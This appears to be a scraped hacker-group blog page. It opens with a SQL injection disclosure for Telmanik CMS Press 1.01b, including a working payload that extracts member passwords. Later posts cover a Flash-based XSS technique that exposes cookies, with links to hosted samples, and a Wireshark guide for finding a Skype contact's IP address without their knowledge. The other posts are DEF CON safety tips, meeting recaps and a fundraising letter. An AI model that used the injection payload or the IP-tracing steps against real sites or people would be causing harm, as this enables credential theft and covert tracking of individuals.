Telmanik CMS Press 1.01 SQLi 0day

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[x] Type: SQL Injection
[x] Vendor: www.telmanik.com
[x] Script Name: Telmanik CMS Press
[x] Script Version: 1.01b
[x] Script DL: http://www.telmanik.com/download/Telmanik_CMS_Press/1.01_beta/telmanik_cms_press_v1.01_beta.zip
[x] Author: Anarchy Angel
[x] Mail : anarchy[at]dc414[dot]org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit:
http://site.org/themes/pages.php?page_name=[SQLi]

you have to formate you injection like so:
union_select_row_from_table
Replacing spaces with “_”.

Ex:
http://site.org/themes/pages.php?page_name=union_select_password_from_members

This is a special DefCon 21 kick off from me! See ya there 😉

Special Tnx : dc414, lun0s, proge, sToRm, progenic, gny

Tips for dc414 members (and everyone else) at DEFCON21

Here are a few tips and guidelines to follow while in Vegas:

  • Keep an eye on dc414’s twitter, Facebook, and G+ feeds to keep up to date on what we are doing so you can join in on the fun.
  • If you have access to dc414’s VPN be sure to use it at all times on your tablet, phone, and laptop. If you do not have access to the VPN but have a server you can access “like one on your home connection”, set up a ssh tunnel and use it at all times.
  • Do not use USB “or CDs/DVDs” sticks from anyone, other then ones you brought your self, including ones you find on the floor or parking lot.
  • Do not leave USB sticks laying out that you intend to use later.
  • Do not let anyone connect their phone to your system for charging or any other reason.
  • Do not connect your phone/tablet to anyones computer other then yours.
  • When using the local WIFI “hotel, convention center, etc” Do not visit any site you intend to login to with the HTTP protocol “ie http://mail.dc414.org” only connect using HTTPS “ie https://mail.dc414.org”
  • Do not scan any QR codes with apps that do not verify the content before displaying it or opening other programs.
  • Do not ever leave your computer, phone, or tablet unattended

July meeting recap

Let me start by saying many thanks to Milwaukee Makerspace for hosting our meeting and to Klaiviel for hooking us up. Ulic got us rolling and gave a awesome presentation on PRISM and other government spying programs. dw5304 was up next and did his cable modem magic for us. Then Klaiviel showed us how to crash RC planes and quad-copters. After words he gave us the grand tour of Makerspace. The rest of the night everyone socialized while vlad, darkwind, and Klaiviel crashed a quad-copter.

UPDATE:
You can get a copy of Ulic’s slides HERE enjoy 🙂

Upload your own XSS

A few meetings ago i gave a demo on uploading a flash file to file hosting sites that contains a evil XSS payload. Here is my write up on it.

A while back I was doing a penetration test on a friends file hosting service application. His service allowed the uploading of flash files and when you viewed the files detail page it showed you a preview of the flash movie. At the time I knew you could use actionscript to put javascript in a flash file but I was not sure if it would have full access to the DOM and allow us to do evil stuff.

I started messing around in actionscript and came up with this:

After compiling it and uploading, when viewing the preview page I was greeted with a prompt box that had the contents of my cookie for that domain and it was displayed in text with in the flash embed! So, just like that we are able to manufacture a XSS vulnerability on a application that is otherwise secure.

There is some protection for this attack. When you embed a flash file in a web page that you don’t trust you should add the allowScriptAccess param and set it to none. However this can be bypassed easily, just go to the swf file itself and it will still execute the javascript supplied by our swf file. This means to be fully protected you will also need to use a modrewrite rule to force a download when ever someone tries to view a swf file directly.

Here is one example – http://www.ziddu.com/viewfile/22413513/xss.swf.html

Here is another – http://swfchan.org/2335/xss.swf

June Meeting Recap

Thanks to all that attended the June meeting.  Lot’s of interesting discussion and demos as usual.

Some highlights were Klaiviel giving an in-depth look at the state of 3D printing with a focus on weapons and some of the issues surrounding it.

We later headed for the roof of Bucketworks to learn about DirectTV hardware installations and some of the tools the pros use.  We got to learn about different satellites  and had some really good discussions while the ISS zipped past brightly in the night sky.  Thanks Darkwind.

dw5304 took over next and showed off some 40Gb Ethernet gear along with a demo.  We also had fun exploiting some really awful security of a customer management portal that dw5304 stumbled upon.

edgewalker was one of the lucky contestants to win the Free Junk Giveaway.  Enjoy the LetterPerfect software on your IBM/DOS compatible PC! 

Some pictures courtesy of our beloved overlord, AnarchyAngel.

A Question to Milwaukee, a Bucketworks Emergency

Bucketworks is a co-working, meetup, and practice space for creative professionals.  They’ve been gracious enough to host DC414 monthly meetings and many other events for hackers.

We’re all at risk of losing this space due to some recent financial problems they’re encountering.  I encourage anyone to give back to this awesome space and help them continue to help us.

DC414 as an organization is helping, you can too by donating to Bucketworks by following this link.

Please read Tim Syth’s (Director of Bucketworks) question to Milwaukee:

After being born and raised in rural Wisconsin, and spending nearly 5 years wandering the planet as a photographer and student, I came to Milwaukee about 18 months ago because the city intrigued me. It was gritty, blue-collar and raw. It did not offer the apparition of a polished facade. Its issues were displayed prominently on its sleeve. It felt real.

Perhaps naively, I also came to Milwaukee hoping I could make a difference. Here was a place I could come and actually have a name and face as I tried to leave a positive mark as the director of a project called Bucketworks. I still believe this.

Bucketworks, for those who don’t know, just celebrated its eleventh birthday. Eleven years ago this May it was started by James Carlson and a cadre of accomplices who wanted nothing more than to explore creatively in a way that only art in warehouses can provide. There was little method to the madness, but it was one of the first collaborative spaces in the country, and in Milwaukee of all places. It was a place all about making it happen (whatever “it” was) and giving people a reason to gather and work together. It was the spot in the city for the curious and motivated to gather and create art, businesses, theater, events and products.

Bucketworks has had its issues, much like its home city, but through thick and thin and two floods Bucketworks has managed to persevere, and in that time, Milwaukee has started to blossom. We now have the Milwaukee Makerspace, ArtMKE, the Hudson, VETransfer, Gener8tor, MARN, the Creative Alliance, Open MiKE, just to name a few. As a relatively new transplant, the vibrancy of the creative culture in Milwaukee is a sorely told story—we are lucky to be in this time and place. But as each of these great efforts filled a niche, and as each of these efforts has been born, Bucketworks has adjusted and pushed ahead because it has always been the job of Bucketworks to be on the edge—to be that hard-to-explain place “where things start.”

Fast forward 18 months from my arrival in Milwaukee to today and some of that gritty, blue-collar and raw is weighing on me. Those of you I have had the pleasure of meeting know that I have been very open about the situation at Bucketworks. It has its issues and it wears its dirt on its sleeve. Specifically, we have not been been paying rent for 4 months. For the year I have been here prior to those four months, we paid $7000/mo for 6 months and $2500/mo for 6 months before that. We are not paying rent because we spent $2500 on a broken heating system we don’t own, but because we could not afford to fix the system completely, we still paid $2500/mo to heat the space in the winter. We patched a roof we don’t own with the gracious donation of time from a Milwaukee startup that helps veterans develop job skills. We repaired air conditioners. We spent $2000 on a sprinkler system we don’t own to get the building up to code. We replaced toilets that were broken, patched floors, and fixed lights, all while running the organization.

But why not just raise the prices to cover the bills? We don’t raise the prices because we feel it is important for there to be a place in our city where a person can explore projects without breaking the bank. We believe a lack of money should not stop people from trying. Bucketworks is home to 15+ businesses on any given month who pay on average less than $200 a month to operate. If you can get past the Commons, bang for your bucket it is the lowest-cost place in the city to start a business. Bucketworks is a place where teenagers from the city come to make art while learning important things like punctuality and responsibility. Bucketworks is a place where people gather to learn English and to learn about citizenship. Bucketworks is a place where people meet to talk about open data and to teach each other about technology and mysticism and financial planning. Bucketworks is a place to sword fight, practice aerial silks and to dance. Bucketworks is where people voluntarily work together on improving healthcare. Bucketworks is the place where bees are nurtured and celebrated. In short, Bucketworks is a living and breathing demonstration of functional, diverse community in a city that is known for its silos and segregation.

Please note this isn’t a blame game that falls on our landlord or others who are currently interested in the space. I have a good relationship with our landlord—we agree with a shake of our hands and then do the best we can. We operate like much of Milwaukee operates, and I think this is to be celebrated. Also note that this text represents solely my words and perspectives.

In closing, I want to say that Bucketworks is cleaning out its closets and washing the dirt from its sleeves. I will meet with anyone who is interested and let them know where we stand, what we need to do better and what our plan is to get there. We already have great partnerships that are interested in supporting and bringing stability to this wonderful project, but right now we need time, and in order to get that time, we need money. $18,000 would get us six months of runway on rent, $36,000 would get us twelve, and anything in between would be awesome.

As a recent transplant to this city who has seen Berlin, Tokyo, Hong Kong, Venice, New York, Mexico City, Riga, Paris and many others, I believe Milwaukee is a place to be right now. We have a city that can hide little and is full of people who want to do more. I am committed to making this a place where people have a real option when they want to try an idea. I am willing to do what it takes to bring long term stability to an awesome project in a city that is just rediscovering itself.

So the question I have is this:

Does Milwaukee want Bucketworks?

If it does, please donate what you can. If all you can do is forward this on, please do so. We have an opportunity to show that Milwaukee is a community together. We are not asking for much and we never have asked for much, but I am asking for Bucketworks now. If we reach our goal, the funds will be used for to cover rent. If we do not reach our goal, the funds will be used to find a new home. Our goal is to raise $18,000+ by the end of the business day today—please help.

Thank you,

Tim Syth
Director of Bucketworks

Getting IP addresses from contacts on Skype as told by Noize.

Skype is an extremely popular, proprietary, cross-platform, peer-to-peer Voice-over-IP software client written by Skype Communications SARL, which is now owned by Microsoft Corporation. Due to its peer-to-peer always-on nature it is possible for a researcher to determine characteristics about a target computer, without the user’s knowledge. This can be leveraged to obtain information like the IP address of a target computer.

This is an Educational Guide only; use knowledge at your own risk! and always “the quieter you become, the more you are able to hear”.

Prerequisites

  • Your IP address

Skype Setup

  1. Head into Tools -> Options -> Advanced -> Connection
  2. Uncheck the checkbox labeled: “Use port 80 and 443 as alternative for incoming connections.”
  3. Use port 1210 for incoming connections.  Located right about the checkbox from step 2
    The reason for using this port is because it’s a unassigned tcp/udp port so we will not be DoSing a port, or cause other issues.

Wireshark Setup

  1. Open wireshark and start watching your incoming and outgoing traffic.
    Sniff the interface you will be using Skype on
  2. Create a filter like this
    ip.src == $your_ip_address and udp.srcport == 1210

Capture IP

  1. Start a call to a person, online or offline
  2. Watch wireshark and it will start to give you outgoing and incoming connections
  3. Once you have an outgoing IP that is consistent to the incoming IP, you have found it.

Happy Hacking!

Many thanks to Noize for writing this up and allowing us to share it.

May meeting recap

The May meeting was another great one. Both Ngharo and my self were late because of traffic and junk so darkwind got things started with his popular demo of sniffing pager messages from the air. I Showed up at the tail end and when he was done I started the introductions. It was good to see all the new faces. After everyone talked for about 15 minutes I gave a live demo on using actionscript “flash” to inject a XSS exploit into a other wise secure website. Then Noize took over and gave a interesting live demo of getting IP addresses from contacts on Skype. Then dw5304 showed some of the features in the untangled firewall software. Congrats to ALee for winning the dc414 free junk giveaway!! Here are some pictures I took of the meeting.

ALee and his winnings!